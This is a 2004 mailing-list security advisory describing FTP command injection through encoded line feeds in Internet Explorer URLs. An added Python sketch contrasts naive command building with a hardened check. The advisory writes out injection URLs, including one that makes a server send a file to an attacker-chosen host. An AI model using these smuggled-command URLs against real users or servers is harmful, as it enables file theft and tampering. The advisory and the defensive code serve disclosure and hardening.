Date: Tue, 7 Dec 2004 04:19:36 +0100
From: Albert Puigsech Galicia <ripe@7a69ezine.org.>
To: [email protected]
Subject: 7a69Adv#15 - Internet Explorer FTP command injection
------------------------------------------------------------------
7a69ezine Advisories 7a69Adv#15
------------------------------------------------------------------
http://www.7a69ezine.org [05/12/2004]
------------------------------------------------------------------
Title: Internet Explorer FTP command injection
Author: Albert Puigsech Galicia - <ripe@7a69ezine.org.>
Software: Microsoft Internet Explorer
Versions: >= 6.0.2800.1106
Remote: yes
Exploit: yes
Severity: Low-Medium
------------------------------------------------------------------
I. Introduction.
Internet Explorer is a well-known HTTP browser, and like others it can use
more protocols, for example FTP. The security history of this browser is
really cool and we are glad for the excellent work done by Microsoft. We love
your (in)security features.
II. Description.
To access an FTP server with Internet Explorer you type
"ftp://ftpuser:ftppass@server/directory" in the address bar; the browser
then connects to the server and executes the following commands (others
are omitted because they are not relevant here).
USER ftpuser
PASS ftppass
CWD /directory/
The security problem is that it is possible to inject FTP commands through
the URL by adding the code %0a (an encoded line feed) followed by your
injected commands. If you use
"ftp://ftpuser:ftppass@server/directory%0asomecommand%0a" it will execute
these commands.
USER ftpuser
PASS ftppass
CWD /directory
somecommand
The last line is an erroneous command, but it's not a problem because
'somecommand' has already been executed.
III. Exploit
You need to deceive a user into going to your URL and then entering a valid
user and password. So yes! Exploitation also requires social engineering.
Then you can do a lot of things using this bug, like creating or deleting
files and directories, but probably the most interesting thing is to
download files. It is possible to do that using this URL:
ftp://server/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file
Then the server will connect to a.b.c.d on port e,f (see the FTP RFC to
translate the port number) and will send the file data.
IV. Patch
Internet Explorer sucks a lot, just turn to Firefox World.
V. Timeline
01/12/2004 - Bug discovered in the Konqueror browser
03/12/2004 - Tried in IE. Also affected!
05/12/2004 - Advisory released
VI. Extra data
You can find more 7a69ezine advisories at the following link:
http://www.7a69ezine.org/avisos/propios [spanish info]
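Added example, not part of the original advisory and not Internet Explorer's code: a Python sketch of the command construction described in section II, showing the decode-then-concatenate behaviour beside a hardened version that refuses control characters in any decoded URL component. The function names, the "anonymous" default user and the bare-LF server behaviour are assumptions made for the illustration.

```python
from urllib.parse import urlsplit, unquote

class UnsafeFtpUrl(ValueError):
    """A decoded URL component would break FTP command framing."""

def _parts(url):
    # Percent-decode the components a client turns into FTP arguments.
    u = urlsplit(url)
    if u.scheme != "ftp":
        raise ValueError("not an ftp:// URL")
    # Assumption: "anonymous" is used when the URL carries no user.
    return [("USER", unquote(u.username or "anonymous")),
            ("PASS", unquote(u.password or "")),
            ("CWD", unquote(u.path or "/"))]

def naive_commands(url):
    """'Before' behaviour from the advisory: decode, then concatenate."""
    return "".join(f"{verb} {arg}\r\n" for verb, arg in _parts(url))

def safe_commands(url):
    """Hardened: refuse any argument containing a control character."""
    out = []
    for verb, arg in _parts(url):
        # CR/LF end an FTP command; reject them and all other C0 controls/DEL.
        bad = [c for c in arg if ord(c) < 0x20 or ord(c) == 0x7F]
        if bad:
            raise UnsafeFtpUrl(f"{verb} argument contains {bad[0]!r}")
        out.append(f"{verb} {arg}\r\n")
    return "".join(out)

def lines_seen_by_server(wire):
    # Assumption: the server accepts a bare LF as a line end, as the
    # advisory's result implies.
    return wire.splitlines()

if __name__ == "__main__":
    url = "ftp://ftpuser:ftppass@server/directory%0asomecommand%0a"
    print(lines_seen_by_server(naive_commands(url)))
    try:
        safe_commands(url)
    except UnsafeFtpUrl as e:
        print("rejected:", e)
```

The check runs after percent-decoding, so it covers the user and password fields as well as the path.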